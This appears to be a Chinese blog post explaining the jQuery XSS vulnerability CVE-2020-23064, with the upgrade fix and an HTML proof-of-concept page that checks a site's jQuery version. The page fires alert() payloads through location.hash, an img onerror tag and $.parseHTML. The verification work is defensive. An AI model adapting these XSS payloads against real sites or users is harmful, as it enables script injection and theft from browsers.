热门标签
热门文章
- 1Windows10环境下,设备进入fastboot状态,fastboot无法识别到设备_window里fastboot devices无反应
- 2git分支与合并的两种方法git merge git rebase【详细教程】_git分支 将两个分支变成一样
- 3Angular JS 入门_angular js入门
- 4vue elementui 动态表头、表头合并、合并行、合并列、行根据某字段内容一致的进行合并、表格列展开收起功能_elementui合并表头
- 5使用Eclipse连接Mysql数据库以及JDBC的学习_idea jdbc连接mysql数据库 和 eclipse连接数据库哪个简单
- 6HarmonyOS NEXT星河版之美团外卖点餐功能实战(下)
- 72024年腾讯云函数计算技术:云原生架构下的Serverless与微服务新篇章_容器技术和函数计算
- 8C++ 后端开发工程师的技术栈整理_c++技术栈
- 9Docker部署Springboot项目
- 10基于STM32F103RCT6最小系统原理图和PCB_stm32f103rct6最小系统图
当前位置: article > 正文
JQuery跨站脚本漏洞_jquery 跨站脚本漏洞(cve-2020-23064)
作者:很楠不爱3 | 2024-06-09 21:33:00
赞
踩
jquery 跨站脚本漏洞(cve-2020-23064)
漏洞描述:
jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
危害级别:中
解决方案:更新jQuery到最新版本:如果是由于jQuery的旧版本中存在漏洞,那么升级到最新版本可以修复这个问题。
漏洞验证:
1、使用Dude Suite访问目标站点,数据监视栏得到jQuery版本。
2、使用如下验证代码,保存为html格式。需要修改第9行,src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"中“你的URL:端口号”为要测试的url,修改"jquery-1.8.2.min.js"为自己要验证的js版本。
- <!DOCTYPE html>
- <html lang="zh">
-
- <head>
- <meta charset="UTF-8">
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <meta http-equiv="X-UA-Compatible" content="ie=edge">
- <title>Jquery XSS</title>
- <script type="text/javascript" src="http://你的URL:端口号/Scripts/jquery-1.8.2.min.js"></script>
- <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->
- <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->
- <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->
- <script>
- $(function () {
- // #9521
- // #11290
- $(location.hash);
-
- // #11974
- $('#bug').on('click', function () {
- $.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>");
- return false;
- });
- })
- </script>
- </head>
-
- <body>
- <h1>jQuery with XSS</h1>
- <h2>Demo:</h2>
- <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>
- <ul>
- <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a
- href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>
- <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a
- href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>
- <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"
- target="_blank">ticket</a></li>
- </ul>
- <h2>Test version:</h2>
- <ul>
- <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>
- </ul>
- <h2>Safe version:</h2>
- <ul>
- <li>1.12.0, 1.12.1 </li>
- <li>2.2.0, 2.2.1</li>
- <li>3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.2.1, 3.3.0, 3.3.1, 3.4.0, 3.4.1, 3.5.0, 3.5.1</li>
- </ul>
- </body>
-
- </html>
3、保存上面代码后用浏览器打开。
可以看到Demo下面有三个bug-*
4、验证:可以依次点击这三个bug-9521 bug-11290 bug-11974,看看哪个会弹窗,我这里是 jQuery v1.8.2 的版本,在点击 bug-11974 发生了弹窗,说明此版本的漏洞被验证成功了。
5、也可以点击页面中的 test version下的 test result,来判断自己版本的 jQuery 版本存在的 bug 编号,例如这里的 jQuery v2.1.4 版本就对应着bug-2432和 bug-11974。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/695855
推荐阅读
相关标签
